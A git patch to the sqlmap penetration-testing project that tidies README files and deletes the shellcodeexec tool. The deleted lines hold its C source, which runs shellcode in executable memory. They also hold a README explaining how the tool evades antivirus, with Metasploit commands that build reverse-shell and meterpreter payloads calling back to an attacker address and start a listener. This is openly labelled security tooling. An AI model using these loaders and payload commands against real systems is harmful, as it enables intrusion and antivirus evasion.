From 224e6376a64084d5fcc61e829b1f43bd3bce343f Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Tue, 17 Jul 2012 00:32:32 +0100 Subject: [PATCH] cleanup to README files --- extra/icmpsh/README.txt | 12 +- extra/runcmd/README.txt | 6 +- extra/shellcodeexec/README | 126 ---------------- extra/shellcodeexec/README.txt | 4 + extra/shellcodeexec/linux/Makefile | 7 - extra/shellcodeexec/linux/shellcodeexec.c | 138 ------------------ extra/shellcodeexec/windows/README | 25 ---- extra/shellcodeexec/windows/shellcodeexec.sln | Bin 889 -> 0 bytes .../windows/shellcodeexec/shellcodeexec.c | 138 ------------------ .../shellcodeexec/shellcodeexec.vcproj | Bin 4048 -> 0 bytes udf/README.txt | 4 +- 11 files changed, 12 insertions(+), 448 deletions(-) delete mode 100644 extra/shellcodeexec/README create mode 100644 extra/shellcodeexec/README.txt delete mode 100644 extra/shellcodeexec/linux/Makefile delete mode 100644 extra/shellcodeexec/linux/shellcodeexec.c delete mode 100644 extra/shellcodeexec/windows/README delete mode 100644 extra/shellcodeexec/windows/shellcodeexec.sln delete mode 100644 extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.c delete mode 100644 extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.vcproj diff --git a/extra/icmpsh/README.txt b/extra/icmpsh/README.txt index 8103e6841..631f9ee37 100644 --- a/extra/icmpsh/README.txt +++ b/extra/icmpsh/README.txt @@ -8,14 +8,14 @@ icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible The master is straight forward to use. There are no extra libraries required for the C version. The Perl master however has the following dependencies: - * IO::Socket - * NetPacket::IP - * NetPacket::ICMP + * IO::Socket + * NetPacket::IP + * NetPacket::ICMP When running the master, don't forget to disable ICMP replies by the OS. For example: - sysctl -w net.ipv4.icmp_echo_ignore_all=1 + sysctl -w net.ipv4.icmp_echo_ignore_all=1 If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive commands send from the master. @@ -29,12 +29,12 @@ The slave comes with a few command line options as outlined below: -t host host ip address to send ping requests to. This option is mandatory! -r send a single test icmp request containing the string "Test1234" and then quit. - This is for testing the connection. + This is for testing the connection. -d milliseconds delay between requests in milliseconds -o milliseconds timeout of responses in milliseconds. If a response has not received in time, - the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit. + the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit. The counter is set back to 0 if a response was received. -b num limit of blanks (unanswered icmp requests before quitting diff --git a/extra/runcmd/README.txt b/extra/runcmd/README.txt index 7d2e93e9c..717800aa4 100644 --- a/extra/runcmd/README.txt +++ b/extra/runcmd/README.txt @@ -1,7 +1,3 @@ Files in this folder can be used to compile auxiliary program that can be used for running command prompt commands skipping standard "cmd /c" way. -They are licensed under the terms of the GNU Lesser General Public License -and it's compiled version is available on the official sqlmap subversion -repository[1]. - -[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/shell/runcmd.exe_ +They are licensed under the terms of the GNU Lesser General Public License. diff --git a/extra/shellcodeexec/README b/extra/shellcodeexec/README deleted file mode 100644 index 47b59bf9c..000000000 --- a/extra/shellcodeexec/README +++ /dev/null @@ -1,126 +0,0 @@ -= Short description = - -shellcodeexec is a small script to execute in memory a sequence of opcodes. - - -= Background = - -Most of the shellcode launchers out there, including proof of concepts -part of many "security" books, detail how to allocate a memory page as -readable/writable/executable on POSIX systems, copy over your shellcode -and execute it. This works just fine. However, it is limited to POSIX, -does not necessarily consider 64-bit architecture and Windows systems. - - -= Description = - -This script and the relevant project files (Makefile and Visual Studio -files) allow you to compile the tool once then run your shellcode across -different architectures and operating systems. - -Moreover, it solves a common real world issue: the target system's anti -virus software blocking a Metasploit-generated payload stager (either EXE -of ELF). Take for instance the following command line: - - $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe - -This generates a Metasploit payload stager, payload.exe, that as soon as -it lands on the AV-protected target system is recognized as malicious and -potentially blocked (depending on the on-access scan settings) by many -anti virus products. At the time of writing this text, 21 out 41 anti -viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it -multiple times with msfencode, less AV softwares detect it, still a lot. - -I have been surfing the Net and found some interesting tutorials and -guides about packing, compressing, obfuscating and applying IDA-foo to -portable executables et similar in order to narrow down the number of AV -products that can detect it as a malicious file. This is all interesting, -but does not stop few hard-to-die anti viruses to detect your backdoor. - -So the question is, how cool would it be to have a final solution to avoid -all this hassle? This is exactly where this tool comes into play! - - -= Features = - -shellcodeexec: - -* Can be compiled and works on POSIX (Linux/Unices) and Windows systems. - -* Can be compiled and works on 32-bit and 64-bit architectures. - -* As far as I know, no AV detect it as malicious. - -* Works in DEP/NX-enabled environments: it allocates the memory page where - it stores the shellcode as +rwx - Readable Writable and eXecutable. - -* It supports alphanumeric encoded payloads: you can pipe your binary-encoded - shellcode (generated for instance with Metasploit's msfpayload) to - Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the - BufferRegister variable to EAX registry where the address in memory of - the shellcode will be stored, to avoid get_pc() binary stub to be - prepended to the shellcode. - -* Spawns a new thread where the shellcode is executed in a structure - exception handler (SEH) so that if you wrap shellcodeexec into your own - executable, it avoids the whole process to crash in case of unexpected - behaviours. - - -= HowTo = - -1. Generate a Metasploit shellcode and encode it with the alphanumeric - encoder. For example for a Linux target: - - $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX - - Or for a Windows target: - - $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX - - -2. Execute the Metasploit multi/handler listener on your machine. For - example for a Linux target: - - $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E - - Or for a Windows target: - - $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E - - -3. Execute the alphanumeric-encoded shellcode with this tool. For example - on the Linux target: - - $ ./shellcodeexec - - Or, on the Windows target: - - C:\WINDOWS\Temp>shellcodeexec.exe - - -= License = - -This source code is free software; you can redistribute it and/or -modify it under the terms of the GNU Lesser General Public -License as published by the Free Software Foundation; either -version 2.1 of the License, or (at your option) any later version. - -This library is distributed in the hope that it will be useful, -but WITHOUT ANY WARRANTY; without even the implied warranty of -MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -Lesser General Public License for more details. - -You should have received a copy of the GNU Lesser General Public -License along with this library; if not, write to the Free Software -Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - - -= Author = - -Bernardo Damele A. G. - - -= Homepage = - -https://github.com/inquisb/shellcodeexec diff --git a/extra/shellcodeexec/README.txt b/extra/shellcodeexec/README.txt new file mode 100644 index 000000000..ad8fe349a --- /dev/null +++ b/extra/shellcodeexec/README.txt @@ -0,0 +1,4 @@ +Binary files in this folder are data files used by sqlmap on the target +system, but not executed on the system running sqlmap. They are licensed +under the terms of the GNU Lesser General Public License and their source +code is available on https://github.com/inquisb/shellcodeexec. diff --git a/extra/shellcodeexec/linux/Makefile b/extra/shellcodeexec/linux/Makefile deleted file mode 100644 index 8ce996abd..000000000 --- a/extra/shellcodeexec/linux/Makefile +++ /dev/null @@ -1,7 +0,0 @@ -32: - gcc -Wall -Os shellcodeexec.c -o shellcodeexec - strip -sx shellcodeexec - -64: - gcc -Wall -Os shellcodeexec.c -fPIC -o shellcodeexec - strip -sx shellcodeexec diff --git a/extra/shellcodeexec/linux/shellcodeexec.c b/extra/shellcodeexec/linux/shellcodeexec.c deleted file mode 100644 index efec8d794..000000000 --- a/extra/shellcodeexec/linux/shellcodeexec.c +++ /dev/null @@ -1,138 +0,0 @@ -/* - shellcodeexec - Script to execute in memory a sequence of opcodes - Copyright (C) 2011 Bernardo Damele A. G. - web: http://bernardodamele.blogspot.com - email: bernardo.damele@gmail.com - - This source code is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2.1 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA -*/ - -#include -#include -#include -#include -#include -#include - -#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32) -#include -DWORD WINAPI exec_payload(LPVOID lpParameter); -#else -#include -#include -#include -#endif - -int sys_bineval(char *argv); - -int main(int argc, char *argv[]) -{ - if (argc < 2) { - printf("Run:\n\tshellcodeexec \n"); - exit(-1); - } - - sys_bineval(argv[1]); - - exit(0); -} - -int sys_bineval(char *argv) -{ - size_t len; - -#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32) - int pID; - char *code; -#else - int *addr; - size_t page_size; - pid_t pID; -#endif - - len = (size_t)strlen(argv); - -#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32) - // allocate a +rwx memory page - code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - - // copy over the shellcode - strncpy(code, argv, len); - - // execute it by ASM code defined in exec_payload function - WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE); -#else - pID = fork(); - if(pID<0) - return 1; - - if(pID==0) - { - page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size - page_size = (len+page_size) & ~(page_size); // align to page boundary - - // mmap an +rwx memory page - addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0); - - if (addr == MAP_FAILED) - return 1; - - // copy over the shellcode - strncpy((char *)addr, argv, len); - - // execute it - ((void (*)(void))addr)(); - } - - if(pID>0) - waitpid(pID, 0, WNOHANG); -#endif - - return 0; -} - -#if defined(_WIN64) -void __exec_payload(LPVOID); - -DWORD WINAPI exec_payload(LPVOID lpParameter) -{ - __try - { - __exec_payload(lpParameter); - } - __except(EXCEPTION_EXECUTE_HANDLER) - { - } - - return 0; -} -#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32) -DWORD WINAPI exec_payload(LPVOID lpParameter) -{ - __try - { - __asm - { - mov eax, [lpParameter] - call eax - } - } - __except(EXCEPTION_EXECUTE_HANDLER) - { - } - - return 0; -} -#endif diff --git a/extra/shellcodeexec/windows/README b/extra/shellcodeexec/windows/README deleted file mode 100644 index 213a6c098..000000000 --- a/extra/shellcodeexec/windows/README +++ /dev/null @@ -1,25 +0,0 @@ -Before compiling, an enviroment variable has to be set. - --------------------------------------------------------------------------- -Variable name Variable description --------------------------------------------------------------------------- -PLATFORM_SDK_DIR Directory where the Platform SDK is installed - - -Procedure for setting environment variables on Windows: -My Computer -> Properties -> Advanced -> Environment Variables -User variables -> New - - -Sample value: --------------------------------------------------------------------------- -Variable name Variable value --------------------------------------------------------------------------- -PLATFORM_SDK_DIR C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2 - - -Notes: - -To get as small portable executable as possible compile as follows: -* Use Visual C++ 2005 -* Strip the executable with UPX diff --git a/extra/shellcodeexec/windows/shellcodeexec.sln b/extra/shellcodeexec/windows/shellcodeexec.sln deleted file mode 100644 index 59d33edafbfe9365d54b2be8d36256cf20fdd013..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 889 zcmbV~K~IA)6vxl>Q#5#)*&qeF2?q~Qm>$$DlIXT_`L|=02GRKayX;62}~K z(PgKm@BjMx`@i=--#@@DOG_a|Ucm<@>x9F&sxu~FEO=cpQNS_dbO6Vqd`(miEoBq* zOoYH$`-JrSFj~$_DkZcL8iGkFUT9kN^pzVBk3@lMxB>PJ%LdLN0YU}p)<05Co+gXbPS9!F#?OY2EpD4TdwW6 z7sIsg$ngooD6`T_^tk7}^f2am;C1F?wJNu35HSiaWKust05LCXNnN-%cHT E0gv()LI3~& diff --git a/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.c b/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.c deleted file mode 100644 index efec8d794..000000000 --- a/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.c +++ /dev/null @@ -1,138 +0,0 @@ -/* - shellcodeexec - Script to execute in memory a sequence of opcodes - Copyright (C) 2011 Bernardo Damele A. G. - web: http://bernardodamele.blogspot.com - email: bernardo.damele@gmail.com - - This source code is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2.1 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA -*/ - -#include -#include -#include -#include -#include -#include - -#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32) -#include -DWORD WINAPI exec_payload(LPVOID lpParameter); -#else -#include -#include -#include -#endif - -int sys_bineval(char *argv); - -int main(int argc, char *argv[]) -{ - if (argc < 2) { - printf("Run:\n\tshellcodeexec \n"); - exit(-1); - } - - sys_bineval(argv[1]); - - exit(0); -} - -int sys_bineval(char *argv) -{ - size_t len; - -#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32) - int pID; - char *code; -#else - int *addr; - size_t page_size; - pid_t pID; -#endif - - len = (size_t)strlen(argv); - -#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32) - // allocate a +rwx memory page - code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - - // copy over the shellcode - strncpy(code, argv, len); - - // execute it by ASM code defined in exec_payload function - WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE); -#else - pID = fork(); - if(pID<0) - return 1; - - if(pID==0) - { - page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size - page_size = (len+page_size) & ~(page_size); // align to page boundary - - // mmap an +rwx memory page - addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0); - - if (addr == MAP_FAILED) - return 1; - - // copy over the shellcode - strncpy((char *)addr, argv, len); - - // execute it - ((void (*)(void))addr)(); - } - - if(pID>0) - waitpid(pID, 0, WNOHANG); -#endif - - return 0; -} - -#if defined(_WIN64) -void __exec_payload(LPVOID); - -DWORD WINAPI exec_payload(LPVOID lpParameter) -{ - __try - { - __exec_payload(lpParameter); - } - __except(EXCEPTION_EXECUTE_HANDLER) - { - } - - return 0; -} -#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32) -DWORD WINAPI exec_payload(LPVOID lpParameter) -{ - __try - { - __asm - { - mov eax, [lpParameter] - call eax - } - } - __except(EXCEPTION_EXECUTE_HANDLER) - { - } - - return 0; -} -#endif diff --git a/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.vcproj b/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.vcproj deleted file mode 100644 index d46f062f5599790fd0fa89868cb9e83296deb3db..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 4048 zcmeHKTW{h<6n^$f`yV1}A2wP!fVmkNy7C35sL&wDCi@U+HP{E3tUcq7ZI*1?|K2mU z2{;W6+rG5bN*H;@bIzRGeBYV=`)w4SZ9pWHvw_;UsH&A?8mPCF1^i2*HT1Tw zzW?F%tNsm5G7`?yETDWU_&xaP>sLzocKr~;KrNP>Iq%-7_~~Y++PJ9K<;2e<1Bwd&B}Y)My{ zASs5h+@dmfu#XFiZ1vlIH{~iz<1BTlz(8{GFi_vTo%1l0s&MlB&D)A5>FIfHrZQqF zhzJ5oQmBX@6R6A=nQ9cOoHY@|M|E>Z2Wk-pB@dO7d!E~02I|I{3a~R82Ez@oR7Rpu zlE)2$D`%<#PL`xR%4JSj{&6yPNlGq(0fv-|Q)F&oF$b}sK42MbAHGR;GIGbK?BR?Z z9>rJ$2No$;aY`flHBbFO&FdR$$_fH1Gf2V_^TRB7Ob~@cW_UWbuDz?-61H} zo!`-7T@gxULK%%nIKyJWKo8VZWKe#xNkaWu#&BD3*5H3eh0XF?IX$KeL1ZcI=5L8$ zc$~+ufp9;Ym*R-YbCH|xT!Q}+4fa+8ZI zIofBVjLh!19Lq)-&a#T&X`m|kxF%u+>4f-e$`F6b6LmZSmNf5_a>FRoB_t=Eu#c`Y zA)nzCwRYm4y42e`JU&II6~~D3bV(1xemn$tSY3!i{t%rAAXA>C$04U*s~}qe@s+6q z{GCAvB!T|~0^hEADDiA1NL0m{vdX?g^i!sJ8KTS3DMLmUAs~qg$`Db#jQKfzR}QyF zHeAf+?0^Nn4be+lI({Pm_lSOn$p0d$ zFG-l}Xtq3WFoPus?1v?9S99cCOEkQ5&IcSb&)cH2d`VGs#gc*Q$Fb>~KK`~_Gk~SZgV3b-tmAug zK~j?>k$kp=*at>`$zT*9P3Gh(??s-|ZFaqe=5(#L)@pV;npN*~G`uV6Znv#ly65Hh zB4yXWOEZdo9Jvo0y$wuBx*n((ca1V=RM6nr!D^vJ7KB>8&%oMA{T+yX@AFuF%{Ld7SY)#C>QvR7S zTbW